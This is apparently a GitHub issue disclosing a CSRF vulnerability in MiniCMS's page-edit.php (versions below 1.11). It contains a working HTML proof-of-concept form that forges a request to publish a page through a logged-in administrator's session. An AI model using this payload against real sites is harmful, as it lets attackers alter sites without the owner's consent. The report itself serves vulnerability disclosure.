-
Notifications
You must be signed in to change notification settings - Fork 62
Open
Description
Vendor of Product
https://github.com/bg5sbk/MiniCMS
Vulnerability Type
CSRF
Vulnerable File
page-edit.php
Affected Product Code Base
<v1.11
POC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.minicms.com/mc-admin/page-edit.php" method="POST">
<input type="hidden" name="_IS_POST_BACK_" value="" />
<input type="hidden" name="title" value="hello" />
<input type="hidden" name="content" value="hello" />
<input type="hidden" name="path" value="/hello" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="hourse" value="" />
<input type="hidden" name="minute" value="" />
<input type="hidden" name="second" value="" />
<input type="hidden" name="can_comment" value="1" />
<input type="hidden" name="state" value="publish" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="save" value="保存" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Vulnerability reproduction
Metadata
Metadata
Assignees
Labels
No labels


